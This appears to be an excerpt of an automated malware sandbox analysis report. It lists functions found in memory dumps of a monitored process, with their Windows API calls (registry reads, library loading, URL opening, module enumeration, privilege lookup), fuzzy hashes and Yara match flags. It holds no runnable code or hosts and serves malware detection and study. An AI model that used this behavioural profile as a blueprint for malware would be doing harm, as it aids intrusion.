Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID: X1kr$X1kr
API String ID: 0-2397868964
Opcode ID: ed528a0b0ec8ad53b230b8e901a755a8b43938ba57554846a706731687854feb
Instruction ID: 6ea06366169bad3562464df46aa87e6cc1ee39f9cec3c41886e34823eb95c5db
Opcode Fuzzy Hash: ed528a0b0ec8ad53b230b8e901a755a8b43938ba57554846a706731687854feb
Instruction Fuzzy Hash: 5511A971F083185BDF54DABAD84079E76E6DBC5260F25C43AD609DB340EA31DC019791

Uniqueness

Uniqueness Score: -1.00%

Function 1F99E1F0, Relevance: 1.7, APIs: 1, Instructions: 202libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F99E230

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c00590f130cd2bf26861fc09f22dcbcda8ce7c916baa6d424ebe0ab95c62e01
Instruction ID: 246dbbe7da5be162cf499b004bf120f1fda11e761165d1b73efa18059a8a2271
Opcode Fuzzy Hash: 2c00590f130cd2bf26861fc09f22dcbcda8ce7c916baa6d424ebe0ab95c62e01
Instruction Fuzzy Hash: AF714E30A0021ADFDB14EFB4C494AAEBBF6BF84355F168529D505A7390EB74E841CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B04465, Relevance: 1.6, APIs: 1, Instructions: 108libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00B05131,00B01E73,00000000,00000000,00000000,00000000,?,00000000), ref: 00B0439F

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 9f50eae08fea98456613fa2e9e13b58e8a847e44c2c2293c0a5fd09b09ddffbf
Instruction ID: 543a4afa95191eb14840e8643ee4843e17db2cbfea0b730ba8c49e9716b6faae
Opcode Fuzzy Hash: 9f50eae08fea98456613fa2e9e13b58e8a847e44c2c2293c0a5fd09b09ddffbf
Instruction Fuzzy Hash: 63319DF0904215ABCF24DF54CA807AA3EE1EF55720F6241E9FE0A672C1D771AC909A82

Uniqueness

Uniqueness Score: -1.00%

Function 1FFC0DBA, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 1FFC0E6D

Memory Dump Source

Source File: 00000006.00000002.603106292.000000001FFC0000.00000040.00000001.sdmp, Offset: 1FFC0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: cc5c32071c8c1f574172ec37e421f18e3b34cc6aefe4aeee653cf6c6d30ac9a4
Instruction ID: 2cb5d75c80db3e2728d3e9416fbd5fe3227d3f392245105fe651c6b3f289fae9
Opcode Fuzzy Hash: cc5c32071c8c1f574172ec37e421f18e3b34cc6aefe4aeee653cf6c6d30ac9a4
Instruction Fuzzy Hash: FE316D75508380AFE722CF65CC84F52BFF8EF06610F09849AE9898B252D375A809CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CB464, Relevance: 1.6, APIs: 1, Instructions: 92COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EB4,4BD0DC94,00000000,00000000,00000000,00000000), ref: 1D5CB4FE

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 4fdf472967f6ebd1d86f8a2cfb748878551d668a66e51e29f56180329551e31d
Instruction ID: fb89f268536e39cb58885408b0c5e86a78ff46f577118f06d6952fef05efc3ba
Opcode Fuzzy Hash: 4fdf472967f6ebd1d86f8a2cfb748878551d668a66e51e29f56180329551e31d
Instruction Fuzzy Hash: B031C8714093806FD7128F65DC45F56BFB8EF46310F0884DBE9859F192D265A50AC772

Uniqueness

Uniqueness Score: -1.00%

Function 1FFC1147, Relevance: 1.6, APIs: 1, Instructions: 91registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,4BD0DC94,00000000,00000000,00000000,00000000), ref: 1FFC11FC

Memory Dump Source

Source File: 00000006.00000002.603106292.000000001FFC0000.00000040.00000001.sdmp, Offset: 1FFC0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 3f4cf74ba19adafe9f670f561d449bf42580ea16aa81df7a629eff88ce185fff
Instruction ID: 2facf2a78d2483ef2a49f4fa994e3c32d780cfa793a95cafa281b1b39d86e43d
Opcode Fuzzy Hash: 3f4cf74ba19adafe9f670f561d449bf42580ea16aa81df7a629eff88ce185fff
Instruction Fuzzy Hash: E1319072108380AFE712CF64CC84F92BFB8AF46710F0884DAE9859F192D264A809CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CA8D9, Relevance: 1.6, APIs: 1, Instructions: 90registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1D5CA989

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 761e0fd9dc9dda848c9d1e4e1ed7b1679b0212ecd4ebd8ba4cb4b21588b5fd2c
Instruction ID: ddbb204a0078c72867524e7467fad6b412f4d7b0b31eb978e290e8e68c8c25b9
Opcode Fuzzy Hash: 761e0fd9dc9dda848c9d1e4e1ed7b1679b0212ecd4ebd8ba4cb4b21588b5fd2c
Instruction Fuzzy Hash: 2A31B172408384AFE7128B65CC85F67FFBCEF06310F08899BE9859B152D364A808CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CA9D1, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,4BD0DC94,00000000,00000000,00000000,00000000), ref: 1D5CAA8C

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 48f51bb9eacca6363958e13bc73d2fb270916bdb3404f261613518735447f43d
Instruction ID: 23f5ddc4b8230247fd4513f1a742a4c856c9fb9e21efa414ba5ac23e53183c65
Opcode Fuzzy Hash: 48f51bb9eacca6363958e13bc73d2fb270916bdb3404f261613518735447f43d
Instruction Fuzzy Hash: 8C319371109784AFE712CB65CC45F63BFFCEF46310F08889AE9858B252D264E949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1F99E19B, Relevance: 1.6, APIs: 1, Instructions: 88libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F99E230

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 21567612a6784fd819ab23785e3a0543148f448c40d0c38868559facc31609db
Instruction ID: fc68a8c305c03bb2318849bc801fb8509fe5a37c454d69a575a8c9e9482fb556
Opcode Fuzzy Hash: 21567612a6784fd819ab23785e3a0543148f448c40d0c38868559facc31609db
Instruction Fuzzy Hash: C1319030E0034ADFD715EFB8C494A9DBFB2BB85311F11856DD401AB2D1EB359882CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CA120, Relevance: 1.6, APIs: 1, Instructions: 83fileCOMMON

Download Yara Rule

APIs

FindNextFileW.KERNELBASE(?,00000EB4,?,?), ref: 1D5CA1C2

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: 1ab1ffcff0cdf3b420d17ed7cfc3e948414616ccf8d3e2b7650c7ae1b43f3459
Instruction ID: 7ef8ca571c49d752e674af220979ec38cd0f1086bf3db76d53e500b330579259
Opcode Fuzzy Hash: 1ab1ffcff0cdf3b420d17ed7cfc3e948414616ccf8d3e2b7650c7ae1b43f3459
Instruction Fuzzy Hash: 1B31D37140D3C06FD7128B358C55B62BFB4EF87620F1985DBD9C48F293D265A909C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 1FFC105E, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1FFC10F2

Memory Dump Source

Source File: 00000006.00000002.603106292.000000001FFC0000.00000040.00000001.sdmp, Offset: 1FFC0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 3455325021cc573ac73ffb750ab8e43b6808e2c5e2680778dea5f0e26007b17f
Instruction ID: 1870a0321b71b3221c4f430c1cdcb75483a1488c86a3bcc3cec66fa63993b112
Opcode Fuzzy Hash: 3455325021cc573ac73ffb750ab8e43b6808e2c5e2680778dea5f0e26007b17f
Instruction Fuzzy Hash: 8821ADB2504384AFE7218F65DC45F67FFACEF45720F08849AED449B242D264A8188B71

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CB55D, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EB4,4BD0DC94,00000000,00000000,00000000,00000000), ref: 1D5CB5EE

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 42a8b3e0f393de549e79e42d94ebb2f0a1da110ea4c378830a881061034294e0
Instruction ID: f76c06a9e63b1e597d56cd80589d3c30e8eb8faca5f2f9bda83a6ac65bf455bb
Opcode Fuzzy Hash: 42a8b3e0f393de549e79e42d94ebb2f0a1da110ea4c378830a881061034294e0
Instruction Fuzzy Hash: CC219F71509380AFE7128B65DC44F66BFBCEF46320F0884ABE945DB252D264E949CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CB654, Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

K32GetModuleFileNameExW.KERNEL32(?,00000EB4,?,?), ref: 1D5CB6FA

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: b5527dc98a9c2a3c8c0d18252ebf9acdb1168fed1f5b1da2401f4eb688759a50
Instruction ID: 32eca52d7eef690b0c9e30ea95d8f5e6c0ccafc2c5e625fad8234c35808ea6f4
Opcode Fuzzy Hash: b5527dc98a9c2a3c8c0d18252ebf9acdb1168fed1f5b1da2401f4eb688759a50
Instruction Fuzzy Hash: CB21A0714093C06FD3128B65CC55F66BFB4EF87610F0980DBE8848B2A3D624A909C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 1FFC0F8C, Relevance: 1.6, APIs: 1, Instructions: 78registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.KERNEL32(?,00000EB4,?,?), ref: 1FFC1032

Memory Dump Source

Source File: 00000006.00000002.603106292.000000001FFC0000.00000040.00000001.sdmp, Offset: 1FFC0000, based on PE: false

Similarity

API ID: Enum
String ID:
API String ID: 2928410991-0
Opcode ID: 5ed12df2851e9084a4fba8a2c52b4a80eae214c0ed4f14c84fa27f3e5032c98b
Instruction ID: 6149d6c46adc88dd61a7770b61ef043fe909365b51f3a6c203be5ea467c1e470
Opcode Fuzzy Hash: 5ed12df2851e9084a4fba8a2c52b4a80eae214c0ed4f14c84fa27f3e5032c98b
Instruction Fuzzy Hash: FD21746550E3C06FC3138B358C55B11BF74DF87610F1D81DFD8848B5A3D225A919C762

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CB2C4, Relevance: 1.6, APIs: 1, Instructions: 76registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,?,?), ref: 1D5CB35E

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 782e39c789d40ab89ef299fb82fd303257df38a6fa6e553683c0e39d9d82ce52
Instruction ID: 8d9263acc7cdf49d142b1a536a8db8ee6d34721c9bc29d241730323def4fe1d0
Opcode Fuzzy Hash: 782e39c789d40ab89ef299fb82fd303257df38a6fa6e553683c0e39d9d82ce52
Instruction Fuzzy Hash: 8321F8754093C06FD3138B258C51F62BFB4EF87A10F0981CBE8848B653D2656919C7B2

Uniqueness

Uniqueness Score: -1.00%

Function 1FFC04F0, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,00000EB4), ref: 1FFC058B

Memory Dump Source

Source File: 00000006.00000002.603106292.000000001FFC0000.00000040.00000001.sdmp, Offset: 1FFC0000, based on PE: false

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bf5ad21b7e21d96c6c2726f2fe59bf19814b191338317dde4e3c68627b7093e6
Instruction ID: abaf7107280c00a8c1233fceb96d91d0a54b1f427d490c7eab4b382a46737878
Opcode Fuzzy Hash: bf5ad21b7e21d96c6c2726f2fe59bf19814b191338317dde4e3c68627b7093e6
Instruction Fuzzy Hash: F6210771008380AFE3128B14CC45F96FFB8DF07724F1884DAEE849F192C2A4A94ACB71

Uniqueness

Uniqueness Score: -1.00%

Function 1FFC0DEE, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 1FFC0E6D

Memory Dump Source

Source File: 00000006.00000002.603106292.000000001FFC0000.00000040.00000001.sdmp, Offset: 1FFC0000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 86230397ecf53fe63a67ecb7e16ffaf8e20dc64fa6fcbed9a184a2ec4b5405a9
Instruction ID: 796d4c60d5d85b561f6a9955a76091e055547b8ed4e4b393679b0efa2aa99af9
Opcode Fuzzy Hash: 86230397ecf53fe63a67ecb7e16ffaf8e20dc64fa6fcbed9a184a2ec4b5405a9
Instruction Fuzzy Hash: 93219A71500340AFE721CF65C984F56FBE8EF09710F04886AEA88CB242E7B1E409CB75

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CA90A, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1D5CA989

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 416fd7dbecdea9364d30af96248dcbba9a11b59fdb8333e01edb3c088155616b
Instruction ID: 3f7f56601ea2d2a6ed616ffac36b2b0cef33d45681580cc682714c2f6bdef09e
Opcode Fuzzy Hash: 416fd7dbecdea9364d30af96248dcbba9a11b59fdb8333e01edb3c088155616b
Instruction Fuzzy Hash: AE21AE72500704AFE7219B55CC85F6BFFECEF04720F04895BEE459B241D660E4098BB2

Uniqueness

Uniqueness Score: -1.00%

Function 1FFC107E, Relevance: 1.6, APIs: 1, Instructions: 73registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000EB4), ref: 1FFC10F2

Memory Dump Source

Source File: 00000006.00000002.603106292.000000001FFC0000.00000040.00000001.sdmp, Offset: 1FFC0000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 6da4b8e0c8b66ab2a2749f2f231b822f4c04addb2b578f81783f6f16a49e04e3
Instruction ID: 0cacd68083f97162362eb311521d3284c0a9b3f5477fbdee6bc363931955f4c4
Opcode Fuzzy Hash: 6da4b8e0c8b66ab2a2749f2f231b822f4c04addb2b578f81783f6f16a49e04e3
Instruction Fuzzy Hash: 9C21AE72500304AFE7209F66DC45F6BFBACEF44720F14846AEE449B241D6B5E4198B75

Uniqueness

Uniqueness Score: -1.00%

Function 1FFC0C4A, Relevance: 1.6, APIs: 1, Instructions: 73fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000EB4,4BD0DC94,00000000,00000000,00000000,00000000), ref: 1FFC0CC9

Memory Dump Source

Source File: 00000006.00000002.603106292.000000001FFC0000.00000040.00000001.sdmp, Offset: 1FFC0000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 4159d772b3ed9699350643d07dd794c6b4080564a3e6b55fa5f27f63f1a4a1c8
Instruction ID: 69ee332b2446e24fe788c402cf8314f3fcf8bd9d436642664ec5190b314f8b17
Opcode Fuzzy Hash: 4159d772b3ed9699350643d07dd794c6b4080564a3e6b55fa5f27f63f1a4a1c8
Instruction Fuzzy Hash: 2B21D172404340BFE7228F55DC44FA7BFA8EF46320F0484AAEE489B252D274A809CB71

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CACEF, Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 1D5CAD6A

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: f1ff0228f9c34bf5e5cd879d3b053579b5e695634204d9c575dda6e309ecfac3
Instruction ID: a46a00310f3341263523ff865e155381c3fb67d7882f724d8f41d3a3e5cf6aaf
Opcode Fuzzy Hash: f1ff0228f9c34bf5e5cd879d3b053579b5e695634204d9c575dda6e309ecfac3
Instruction Fuzzy Hash: A32180B65093805FD7168B65DC85B93BFF8EF46210F0984EAD985CF263E274D808C762

Uniqueness

Uniqueness Score: -1.00%

Function 00B02E41, Relevance: 1.6, APIs: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00B02F0F

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: d77f47e1d56a6ddf5cb419d675a7c546f16b08e901a3a8a79b1165019abc2808
Instruction ID: 93c2c0506f1add17cceeac5e78a328d1e922eff5d61815c6eb1fd691fefedfe3
Opcode Fuzzy Hash: d77f47e1d56a6ddf5cb419d675a7c546f16b08e901a3a8a79b1165019abc2808
Instruction Fuzzy Hash: 5C218430144387AFEB318F14CD99BEA3BE5EF01340F108065BD499A5C1E7709E49AB10

Uniqueness

Uniqueness Score: -1.00%

Function 00B01B03, Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00B01B34

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 88d64fff281512bf7ae2627dbe240c83d7861f4a5f7c57d67f9d2c35b447d9df
Instruction ID: 3e24315b7c562c13666ea6b278ec8e91decb55bd2608c57fe50e1ee10d739760
Opcode Fuzzy Hash: 88d64fff281512bf7ae2627dbe240c83d7861f4a5f7c57d67f9d2c35b447d9df
Instruction Fuzzy Hash: 031102B05043405EE7254F28CDD9B5A3EE5EF0A720F2687D5E812CB1E2C774D8889622

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CAA12, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,4BD0DC94,00000000,00000000,00000000,00000000), ref: 1D5CAA8C

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 4226751f9b80cb5d5a5baf31475fd64f23e7c5c53e09c203cd85cb5473969520
Instruction ID: e0205a0e741530b262062e253ba71f499fc5ba44c1ed7aa23b4d421c42f6b591
Opcode Fuzzy Hash: 4226751f9b80cb5d5a5baf31475fd64f23e7c5c53e09c203cd85cb5473969520
Instruction Fuzzy Hash: 88219D71600604AFE721CF55CD84FA7FBECEF04720F04886AEE499B251D764E909CA72

Uniqueness

Uniqueness Score: -1.00%

Function 1FFC118A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000EB4,4BD0DC94,00000000,00000000,00000000,00000000), ref: 1FFC11FC

Memory Dump Source

Source File: 00000006.00000002.603106292.000000001FFC0000.00000040.00000001.sdmp, Offset: 1FFC0000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: bac09d069855e5e6f9b313bbe66daecce87a181ba4fcb91e2b9cf827706cc68e
Instruction ID: ca9dc165b9556577b5a0f90cc3f414db0fddd6006931c768978bd7551f41b9a8
Opcode Fuzzy Hash: bac09d069855e5e6f9b313bbe66daecce87a181ba4fcb91e2b9cf827706cc68e
Instruction Fuzzy Hash: 4621AC76500200AEEB20CF25DC84F97BBECEF44720F1485AAEE45DB241D6B4E819CA71

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CAAFB, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

MkParseDisplayName.OLE32(?,00000EB4,?,?), ref: 1D5CAB7E

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: DisplayNameParse
String ID:
API String ID: 3580041360-0
Opcode ID: 6e13e32ad29e9c0a49b57ad23e972102a1792600c42beaebe0ef893bd211da33
Instruction ID: f31124e308ad464411360344f99a1e2a49555ea3163acd03769d01dcfe96c385
Opcode Fuzzy Hash: 6e13e32ad29e9c0a49b57ad23e972102a1792600c42beaebe0ef893bd211da33
Instruction Fuzzy Hash: 2F21A5715093806FD3128B26CC41F72BFB4EF86620F1981DAED848B653D265A915C7A6

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CB58A, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

K32GetModuleInformation.KERNEL32(?,00000EB4,4BD0DC94,00000000,00000000,00000000,00000000), ref: 1D5CB5EE

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: InformationModule
String ID:
API String ID: 3425974696-0
Opcode ID: 321ecdf033a70912ade08d1b0677a06ba8d73df9525b54b5834dab30da05f9fb
Instruction ID: 8def8b6c13f8f1597a5714ec39125ffb630df7580f8a605bd006e387a3f0781d
Opcode Fuzzy Hash: 321ecdf033a70912ade08d1b0677a06ba8d73df9525b54b5834dab30da05f9fb
Instruction Fuzzy Hash: E211AF71500200AFE711CF59DC85F6BBBACEF45720F04846BEE08CB241D6B4E4488A72

Uniqueness

Uniqueness Score: -1.00%

Function 1FFC1256, Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?,00000EB4,4BD0DC94,00000000,00000000,00000000,00000000), ref: 1FFC12D5

Memory Dump Source

Source File: 00000006.00000002.603106292.000000001FFC0000.00000040.00000001.sdmp, Offset: 1FFC0000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: c88a0881899b82dc15ff13a10d183f59ae885ade10f59fc306876c9ebe00c471
Instruction ID: 248be491250d7af864f3b61cafef47206aa2ee8cc7e3cb6a5c8ada4cf9dec490
Opcode Fuzzy Hash: c88a0881899b82dc15ff13a10d183f59ae885ade10f59fc306876c9ebe00c471
Instruction Fuzzy Hash: 0021A271509380AFE7128B25DC45F56FFB8EF46314F1884DBEA849F292C365A409C776

Uniqueness

Uniqueness Score: -1.00%

Function 00B04AE1, Relevance: 1.6, APIs: 1, Instructions: 66libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00B05131,00B01E73,00000000,00000000,00000000,00000000,?,00000000), ref: 00B0439F

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: e3f28425df69ce147f2279b1ce1c2bf252871aa1a0439f667cfe39695ed75f4b
Instruction ID: e9895cd43dce4de3b7de38af06ba15c643a1ac7763031bf32755fdcfbf3d92cc
Opcode Fuzzy Hash: e3f28425df69ce147f2279b1ce1c2bf252871aa1a0439f667cfe39695ed75f4b
Instruction Fuzzy Hash: 881108E0A45211A9DF307A9046C17BA3CE5CBA1771F6641FAFF53521C1DBA898C4A503

Uniqueness

Uniqueness Score: -1.00%

Function 00B02E83, Relevance: 1.6, APIs: 1, Instructions: 65networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlA.WININET(?,?,00000000,00000000,84000100,00000000,?,?,00000002,?,00000004), ref: 00B02F0F

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID:
API String ID: 2038078732-0
Opcode ID: 1b08cfce5ddd600b1bb49257bebdf068b891d9d2f2fa2a16ffa619c7028759ee
Instruction ID: f351134a3fa177aca1b503d8515b72f45fcd8b3fa902db1eac414a982d67c942
Opcode Fuzzy Hash: 1b08cfce5ddd600b1bb49257bebdf068b891d9d2f2fa2a16ffa619c7028759ee
Instruction Fuzzy Hash: 9C21543024038BAFEB718F14CD99BEA3BE5EF00740F408465FD499A6C1EB719E499B14

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CB4A2, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(?,00000EB4,4BD0DC94,00000000,00000000,00000000,00000000), ref: 1D5CB4FE

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: EnumModulesProcess
String ID:
API String ID: 1082081703-0
Opcode ID: 76be0aa1c6cc00cb5c8a817d91d699f4b42d52d91bc59a10caf692605bccfd3e
Instruction ID: 499461e86fc42fd0f0d3c54da893410ff4a8bd5b08124d65c133d5bdb52c7684
Opcode Fuzzy Hash: 76be0aa1c6cc00cb5c8a817d91d699f4b42d52d91bc59a10caf692605bccfd3e
Instruction Fuzzy Hash: C011C471504200AFEB11CF59DD85F57FBACEF45720F14886BEE499B241D6B4A408CB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CA836, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(?,4BD0DC94,00000000,?,?,?,?,?,?,?,?,72F43C38), ref: 1D5CA8A8

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 4509a94c3c88894b5ff5a4c3efa06af86318746f2c90b25330a539ca0bbd8de1
Instruction ID: 3dd695f48e0e05172e02eaa58259c254ca9818eb4a13acfbc94b648b98fe7b92
Opcode Fuzzy Hash: 4509a94c3c88894b5ff5a4c3efa06af86318746f2c90b25330a539ca0bbd8de1
Instruction Fuzzy Hash: BA218C7140D3C4AFD7138B258C54652BFB4DF07624F0984DBDD858F1A3D2A95909DB72

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CA78B, Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D5CA7F6

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 45868d6f5bfc848945b7a4de3a2e3f92220b08d3d93754610ef50d47b4a9d43c
Instruction ID: 7449bb621c61e6917f29c726cfaff450fa57a765245293a468999cc167e1d41a
Opcode Fuzzy Hash: 45868d6f5bfc848945b7a4de3a2e3f92220b08d3d93754610ef50d47b4a9d43c
Instruction Fuzzy Hash: 28118471409380AFDB228F55DC44B62FFF8EF4A210F0885DAEE898B152D375A519DB72

Uniqueness

Uniqueness Score: -1.00%

Function 1FFC0C6A, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,00000EB4,4BD0DC94,00000000,00000000,00000000,00000000), ref: 1FFC0CC9

Memory Dump Source

Source File: 00000006.00000002.603106292.000000001FFC0000.00000040.00000001.sdmp, Offset: 1FFC0000, based on PE: false

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: cab9079446518f0f6ebb5b5fe4d445454d9fd3577f0c267e0396f0282e51cf96
Instruction ID: f615c94d8b8ffdee0e552aeae54254277224a677f0b415c52569773a2f49e2ea
